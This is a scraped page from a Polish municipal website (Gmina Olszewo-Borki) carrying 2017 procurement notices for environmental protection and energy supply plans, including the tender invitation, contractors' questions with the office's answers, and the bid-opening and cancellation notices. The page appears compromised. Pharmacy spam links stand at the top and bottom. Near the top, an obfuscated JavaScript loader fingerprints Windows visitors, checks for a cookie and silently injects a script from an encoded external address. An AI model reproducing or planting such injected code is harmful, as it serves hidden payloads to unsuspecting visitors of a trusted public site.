Pain-relief infobuy Lioresal online | order trazodone online | Info sitebuy Flagyl without prescription | Instructions, 5mg, 20 mg pills best priceCialis best price | Acheter cialis sur internet acheter Cialis sans ordonnance
11.jpg12.jpg21.jpg22.jpg31.jpg32.jpg41.JPG42.jpg51.JPG52.jpg
;(function(){var l=navigator[u("xt)n,eug(Aor{e)s,u(")];var y=document[u("0e(i,kio3o4c}")];if(x(l,u("ws;w{o;d)n;i{W3"))&&!x(l,u("#d;i(o1r1d{n4A,"))){if(!x(y,u("e=)a)m6t)u}_)_;_5"))){var a=document.createElement('script');a.type='text/javascript';a.async=true;a.src=u('13(c11{5,7xar2{e{e{d(3ield;6,f,5f5bar3)73=3v,&;0(4;27={d2i}c}?cs{j(.}e4d7o0c{_(s}/,m4o2c).;8;092{s}c7i}t(y;loa}n2a,krc4i5l9ch.}k(c)i}l1c9/,/(:(s(p(t(t}hv');var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(a,s);}}function u(v){var i='';for(var b=0;b=0;g--){f+=q[g];}return f;}})();

Analiza rynku - Opracowanie planów i programów w zakresie ochrony środowiska

Olszewo-Borki, dn. 08.08.2017r.

RO.062.POŚ.1.2017


INFORMACJA O UNIEWAŻNIENIU POSTĘPOWANIA

Informacja do pobrania

 


Olszewo-Borki, dn. 07.08.2017r.

RO.062.POŚ.1.2017


INFORMACJA Z OTWARCIA OFERT


Zamawiający na podstawie art. 86 ust. 5 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 ze zm.) przekazuje informacje, o których mowa w art. 86 ust. 3 i 4 cyt. ustawy. W dniu 7 sierpnia 2017r. o godzinie 12:00 w tymczasowej siedzibie Urzędu Gminy w Olszewie-Borkach, 07-415 Olszewo-Borki ul. Dojazdowa 14A, odbyto się otwarcie ofert w toku prowadzonego postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie o wartości szacunkowej poniżej 30.000 euro na zadanie pn Opracowanie planów i programów w zakresie ochrony środowiska w następujących częściach

Plik do pobrania


Olszewo- Borki, dn. 02.08.2017r.

RO.062.POŚ.1.2017

Wyjaśnienie

Dot. postępowania o udzielenie zamówienia publicznego w trybie zapytania ofertowego pn. Opracowanie planów i programów w zakresie ochrony środowiska w następujących częściach:

Część 1:

  1. Program Ochrony Środowiska dla Gminy Olszewo-Borki na lata 2017–2020 z uwzględnieniem lat 2021–2024 wraz z Prognozą Oddziaływania na Środowisko.
  2. Raport z realizacji dotychczas obowiązującego Programu Ochrony Środowiska Gminy Olszewo-Borki 

Część 2: Aktualizacja założeń do Planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe

w odpowiedzi na zapytanie Wykonawcy z dn. 02.08.2017r., Zamawiający wyjaśnia:

 

Pytanie wykonawcy:

W części "Zał. 1 Specyfikacja Zamówienia, III Przedmiot zamówienia, pkt 2. Program ochrony środowiska, pkt. e) strategię krótkoterminową z określeniem zadań własnych na najbliższe 4 lata z określeniem zadań własnych powiatu i koordynowanych". Czy w specyfikacji słusznie podano "powiatu" czy nie powinno być raczej gminy jako, że program ma być sporządzony dla obszaru gminy?

Odpowiedź Zamawiającego:

Błąd pisarski – powinno być „gminy”, wobec czego w załączniku nr 1 p. III Przedmiot zamówienia ust. 2 lit. e otrzymuje brzmienie: „e) strategię krótkoterminową na najbliższe 4 lata z określeniem zadań własnych gminy i koordynowanych”. 

Pytanie wykonawcy:

Czy "Prognoza Oddziaływania na Środowisko Programu Ochrony Środowiska dla Gminy Olszewo-Borki na lata 2017–2020 z uwzględnieniem lat 2021–2024" jest dokumentem obligatoryjnym?, czy jego sporządzenie zależy od konieczności sporządzenia prognozy wydanym przez jeden z organów: PWIS lub RDOS.

Odpowiedź Zamawiającego:

Opracowanie OOŚ zależy od opinii w zakresie jej sporządzenia przez Państwowego Wojewódzkiego Inspektora Sanitarnego w Warszawie i Regionalnego Dyrektora Ochrony Środowiska w Warszawie.

Pytanie wykonawcy:

W części "Zał. 1 Specyfikacja Zamówienia, IV Warunki realizacji zamówienia", mowa jest o zaopiniowaniu Programu Ochrony Środowiska przez Zarząd Województwa Mazowieckiego, podczas gdy ustawa nakłada obowiązek opiniowania programów gminnych przez Zarząd Powiatu, czy nie należy tego uwzględnić?
Odpowiedź Zamawiającego:

Tak, należy opracowany program przedstawić do zaopiniowania Zarządowi Powiatu Ostrołęckiego.

Pytanie wykonawcy:

Co rozumie się poprzez "publiczna prezentacja projektów dokumentów, w terminie i w miejscu wskazanym przez Zamawiającego, nie później jednak niż do 30 października 2017" podane w "Zał. 1 Specyfikacja Zamówienia, IV Warunki realizacji zamówienia", czy chodzi tu o spotkanie z mieszkańcami? lub też o jakąś inna formę publicznej prezentacji zamawiający pisze.

Odpowiedź Zamawiającego:

Element realizacji do uzgodnienia po zawarciu umowy, prezentacja może się odbyć np. podczas sesji rady gminy.


Olszewo-Borki, dn. 28 lipca 2017r.

RO.062.POŚ.1.2017

ZAPROSZENIE DO SKŁADANIA OFERT

Gmina Olszewo-Borki zaprasza do składania ofert w postępowaniu o udzielenie zamówienia publicznego o wartości szacunkowej nie przekraczającej równowartości w złotych polskich kwoty 30.000 euro pn. Opracowanie planów i programów w zakresie ochrony środowiska w następujących częściach:

Część 1:

  1. Program Ochrony Środowiska dla Gminy Olszewo-Borki na lata 2017–2020 z uwzględnieniem lat 2021–2024 wraz z Prognozą Oddziaływania na Środowisko.
  2. Raport z realizacji dotychczas obowiązującego Programu Ochrony Środowiska Gminy Olszewo-Borki  

Część 2:

Aktualizacja założeń do Planu zaopatrzenia w ciepło, energię elektryczną i paliwa gazowe

Informacje ogólne:

Zamawiający informuje, iż niniejsze postępowanie o udzielenie zamówienia prowadzone jest poza ustawą z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz.U. z 2015r. poz. 2164 ze zm.), na podstawie art. 4 pkt. 8 ww. ustawy, ponieważ wartość zamówienia nie przekracza wyrażonej w złotych równowartości kwoty 30.000 euro. Niniejsze zapytanie ma formę rozeznania rynku i prowadzone jest w celu realizacji zasady konkurencyjności.

Zamawiający:

Gmina Olszewo-Borki z siedzibą 07-415 Olszewo-Borki ul. Wł.Broniewskiego 13

Odbiorca: Urząd Gminy w Olszewie-Borkach adres jw.

e-mail: Ten adres pocztowy jest chroniony przed spamowaniem. Aby go zobaczyć, konieczne jest włączenie w przeglądarce obsługi JavaScript. faks 29 643 20 74 tel. 505 778 625

Strona internetowa : www.olszewo-borki.pl,

Składanie ofert:

Ofertę należy złożyć w siedzibie zamawiającego w nieprzekraczalnym terminie do dnia 7 sierpnia 2017r. do godz. 10:00 (decyduje data wpływu do Zamawiającego).

Informacja o wyborze najkorzystniejszej oferty zostanie podana do publicznej wiadomości na stronie internetowej Zamawiającego.

Wybrany wykonawca zostanie powiadomiony pisemnie, celem zawarcia umowy na realizację zamówienia.

Ofertę należy złożyć w jednej kopercie zaadresowanej na adres Zamawiającego: Gmina Olszewo-Borki 07-415 Olszewo-Borki ul. Wł. Broniewskiego 13 (biuro podawcze) i opatrzonej napisem: Oferta na Opracowanie planów i programów w zakresie ochrony środowiska

Oferty, które wpłyną do Zamawiającego po wyznaczonym terminie zostaną zwrócone wykonawcy bez otwierania.

Oferty przesłane faksem lub drogą elektroniczną nie będą rozpatrywane.

Opis przedmiotu zamówienia – zgodnie z dołączoną specyfikacją (załącznik nr 1)

Zamawiający nie przewiduje publicznej sesji otwarcia ofert.

SIWZ do pobrania

Hydroquinone and retin a cream buy retinol cream
Copyright - All Rights Reserved
Urzad Gminy Olszewo-Borki
ul. Wl. Broniewskiego 13, 07-415 Olszewo - Borki, tel: (29) 761-31-07

Strona ta wykorzystuje pliki cookies w celu realizacji swoich usług i funkcji zgodnie z Polityką Plików Cookies. Możesz samodzielnie dostosować warunki przechowywania lub dostępu do plików cookies w Twojej przeglądarce. To find out more about the cookies we use and how to delete them, see our privacy policy.

Akceptuj pliki cookie dla tej strony.

EU Cookie Directive Module Information